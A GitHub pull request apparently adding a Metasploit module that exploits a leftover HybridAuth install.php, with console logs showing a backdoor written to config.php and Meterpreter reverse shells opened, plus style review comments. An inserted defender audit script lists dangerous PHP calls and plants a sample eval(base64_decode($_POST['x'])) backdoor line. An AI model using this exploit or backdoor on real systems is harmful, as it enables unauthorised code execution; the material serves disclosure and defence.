Add HybridAuth install.php PHP Code Execution module #3659

Merged
merged 2 commits into from Aug 19, 2014


@bcoles
Contributor
bcoles commented Aug 16, 2014

Add HybridAuth install.php PHP Code Execution module

Tested on HybridAuth versions 2.0.9, 2.0.10, 2.0.11, 2.1.2, 2.2.2 on Apache/2.2.14 (Ubuntu)
Homepage: http://hybridauth.sourceforge.net/
Source: https://github.com/hybridauth/hybridauth

msf exploit(hybridauth_install_php_exec) > set VERBOSE true
msf exploit(hybridauth_install_php_exec) > set RHOST 192.168.1.1
msf exploit(hybridauth_install_php_exec) > set TARGETURI /hybridauth-2.2.2/hybridauth/
msf exploit(hybridauth_install_php_exec) > check
[*] 192.168.1.1:80 - Found version: 2.2.2
[+] 192.168.1.1:80 - The target is vulnerable.
msf exploit(hybridauth_install_php_exec) > run
[*] Started reverse handler on 192.168.1.136:4444
[*] 192.168.1.1:80 - Found version: 2.2.2
[*] 192.168.1.1:80 - Writing backdoor to config.php
[+] 192.168.1.1:80 - Wrote backdoor successfully
[*] 192.168.1.1:80 - Sending payload to config.php backdoor (1756 bytes)
[*] Sending stage (40551 bytes) to 192.168.1.1
[*] Meterpreter session 1 opened (192.168.1.136:4444 -> 192.168.1.1:55680) at 2014-08-16 18:01:38 -0400
[!] 192.168.1.1:80 - No response
[*] 192.168.1.1:80 - Removing backdoor from config.php
[+] 192.168.1.1:80 - Removed backdoor successfully

meterpreter > getuid
Server username: www-data (33)
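A defender-side audit script in Ruby, added here and not part of the pull request or the Metasploit module, that checks a document root for the two conditions the module depends on: an install.php still present in a HybridAuth directory, and a config.php that contains more than configuration. It assumes a HybridAuth directory can be recognised by its Hybrid/ subdirectory, uses a heuristic list of function names and a constructed sample tree, none of which come from the page.

```ruby
require 'find'
require 'fileutils'
require 'tmpdir'

# Function names that have no business in a plain HybridAuth config.php;
# a hit suggests code was written through install.php (heuristic, assumed).
SUSPECT_CALLS = %w(eval system exec shell_exec passthru base64_decode assert).freeze

# Walk docroot and collect findings: leftover install.php files and
# config.php files whose contents look like more than a config array.
# A directory counts as a HybridAuth install if it has a Hybrid/ subdirectory (assumption).
def audit_hybridauth(docroot)
  findings = []
  Find.find(docroot) do |path|
    next unless File.directory?(path) && File.directory?(File.join(path, 'Hybrid'))
    install = File.join(path, 'install.php')
    config  = File.join(path, 'config.php')
    findings << [:install_present, install] if File.exist?(install)
    next unless File.file?(config)
    src  = File.read(config)
    hits = SUSPECT_CALLS.select { |fn| src =~ /\b#{fn}\s*\(/ }
    findings << [:config_suspect, config, hits] unless hits.empty?
  end
  findings
end

# Constructed sample tree (not a real install): one directory with the installer
# left behind and an injected line in config.php, one clean directory.
def build_sample_tree(base)
  app = File.join(base, 'hybridauth')
  FileUtils.mkdir_p(File.join(app, 'Hybrid'))
  File.write(File.join(app, 'install.php'), "<?php // installer left in place\n")
  File.write(File.join(app, 'config.php'),
             "<?php\nreturn array(\"base_url\" => \"http://example.test/\");\n" \
             "eval(base64_decode(\$_POST['x']));\n") # constructed injected line
  clean = File.join(base, 'clean', 'hybridauth')
  FileUtils.mkdir_p(File.join(clean, 'Hybrid'))
  File.write(File.join(clean, 'config.php'), "<?php\nreturn array(\"base_url\" => \"/\");\n")
  app
end

# Run the audit over the constructed tree and return its findings.
def demo
  Dir.mktmpdir do |tmp|
    build_sample_tree(tmp)
    audit_hybridauth(tmp)
  end
end

demo.each { |f| puts f.inspect } if __FILE__ == $PROGRAM_NAME
```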
@wchen-r7 wchen-r7 and 2 others commented on an outdated diff Aug 18, 2014
...s/exploits/unix/webapp/hybridauth_install_php_exec.rb
+ HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'
+ is not removed after installation allowing unauthenticated users to
+ write PHP code to the application configuration file 'config.php'.
+
+ Note: This exploit will overwrite the application configuration file
+ rendering the application unusable.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Pichaya Morimoto', # Discovery and PoC
+ 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+ ],
+ 'References' =>
+ [
+ %w|EDB 34273 |,
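Review bot: the reference entry on the last line, "%w|EDB 34273 |", uses a pipe as the %w delimiter and carries stray internal and trailing whitespace; the surrounding 'Author' array in this same hunk uses plain brackets, so for consistency write it as ['EDB', '34273'] (or %w(EDB 34273) if a percent literal is wanted).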
@wchen-r7
wchen-r7 Aug 18, 2014 Contributor

That's something new, who recommended this format?

@bcoles
bcoles Aug 18, 2014 Contributor

It's a rubocop recommendation. I rolled with it because it's smaller, but in hindsight I should have used [] for consistency.

@kernelsmith
kernelsmith Aug 18, 2014 Contributor

I think the rubocop suggestion is fine, though I'm not sure I agree with it; however, the pipe '|' is a very non-traditional choice for the delimiter. rubocop usually suggests a '(',
so typically you'd see:

%w(EDB 34273),

Most of the framework uses either [ ] or %w{ }, but apparently the '{' is not in favor, so rubocop usually suggests the '('. I think the pipe is a bad choice unless you can't use some of the more traditional chars due to the content of the array. The pipe is used for way too many other operations in Ruby, and I would not land this code as is.

I would use either %w(EDB 34273), or ['EDB', '34273']
2nd choice would be %w{EDB 34273},
Last choice, with justification, would be %w|EDB 34273|,


@wchen-r7
wchen-r7 Aug 18, 2014 Contributor

rubocop is still currently experimental, we don't really have to agree with it. To be honest, I don't like everything rubobot suggests either.

@jvazquez-r7 jvazquez-r7 added the module label Aug 18, 2014
@wchen-r7 wchen-r7 self-assigned this Aug 19, 2014
@wchen-r7
Contributor
msf exploit(hybridauth_install_php_exec) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] 192.168.1.83:80 - Writing backdoor to config.php
[+] 192.168.1.83:80 - Wrote backdoor successfully
[*] 192.168.1.83:80 - Sending payload to config.php backdoor (1756 bytes)
[*] Sending stage (40551 bytes) to 192.168.1.83
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.83:51196) at 2014-08-19 17:17:45 -0500
[!] 192.168.1.83:80 - No response
[*] 192.168.1.83:80 - Removing backdoor from config.php
[+] 192.168.1.83:80 - Removed backdoor successfully

meterpreter >
@wchen-r7 wchen-r7 merged commit 564431f into rapid7:master Aug 19, 2014

@wchen-r7 wchen-r7 added a commit that referenced this pull request Aug 19, 2014
@wchen-r7 wchen-r7 Land #3659 - Add HybridAuth install.php PHP Code Execution c73ec66
@bcoles bcoles deleted the bcoles:hybridauth_install_php_exec branch Aug 20, 2014